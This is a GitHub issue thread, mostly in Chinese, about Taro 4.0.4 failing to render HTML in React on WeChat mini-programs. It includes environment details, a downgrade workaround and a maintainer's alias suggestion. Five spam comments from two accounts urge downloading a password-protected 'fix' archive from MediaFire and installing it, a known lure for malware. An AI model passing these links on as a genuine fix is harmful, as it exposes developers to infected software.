### ISSUE TITLE
[BUG]4.0.4 react 无法渲染 HTML

### ISSUE THREAD

**Issue by woai3c** [NervJS/taro#16408]
### 相关平台
微信小程序

**小程序基础库: 3.5.3**
**使用框架: React**

### 复现步骤
下载 taro 模板后按文档示例跑，无法渲染 HTML。

### 期望结果
正常渲染 HTML

### 实际结果
无法渲染 HTML

### 环境信息
```
  Taro CLI 4.0.4 environment info:
    System:
      OS: Windows 10 10.0.19045
    Binaries:
      Node: 20.16.0 - D:\software\nodejs\node.EXE
      Yarn: 1.22.22 - D:\software\nodejs\yarn.CMD
      npm: 10.8.1 - D:\software\nodejs\npm.CMD
    npmPackages:
      @tarojs/cli: 4.0.4 => 4.0.4
      @tarojs/components: 4.0.4 => 4.0.4
      @tarojs/helper: 4.0.4 => 4.0.4
      @tarojs/plugin-framework-react: 4.0.4 => 4.0.4
      @tarojs/plugin-html: 4.0.4 => 4.0.4
      @tarojs/plugin-platform-alipay: 4.0.4 => 4.0.4
      @tarojs/plugin-platform-h5: 4.0.4 => 4.0.4
      @tarojs/plugin-platform-jd: 4.0.4 => 4.0.4
      @tarojs/plugin-platform-qq: 4.0.4 => 4.0.4
      @tarojs/plugin-platform-swan: 4.0.4 => 4.0.4
      @tarojs/plugin-platform-tt: 4.0.4 => 4.0.4
      @tarojs/plugin-platform-weapp: 4.0.4 => 4.0.4
      @tarojs/react: 4.0.4 => 4.0.4
      @tarojs/runtime: 4.0.4 => 4.0.4
      @tarojs/shared: 4.0.4 => 4.0.4
      @tarojs/taro: 4.0.4 => 4.0.4
      @tarojs/taro-loader: 4.0.4 => 4.0.4
      @tarojs/vite-runner: 4.0.4 => 4.0.4
      @tarojs/webpack5-runner: 4.0.4 => 4.0.4
      babel-preset-taro: 4.0.4 => 4.0.4
      react: ^18.0.0 => 18.3.1
```

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by woai3c** [comment]
改成 3.x 版本已经正常了。

**Comment by woai3c** [comment]
> vue 也是, v-html 不能用

原生渲染的 html 功能不能用，导致上层的 react vue 都用不了。我已经回退到 3.6.35 版本了，手动降级下依赖就行，其他都不用动。

**Comment by TheKonka** [comment]
可以在编译配置里面 临时加下这个 alias 看看
`@tarojs/runtime': require.resolve('@tarojs/runtime')`

**Comment by woai3c** [comment]
> 可以在编译配置里面 临时加下这个 alias 看看 `@tarojs/runtime': require.resolve('@tarojs/runtime')`

ok
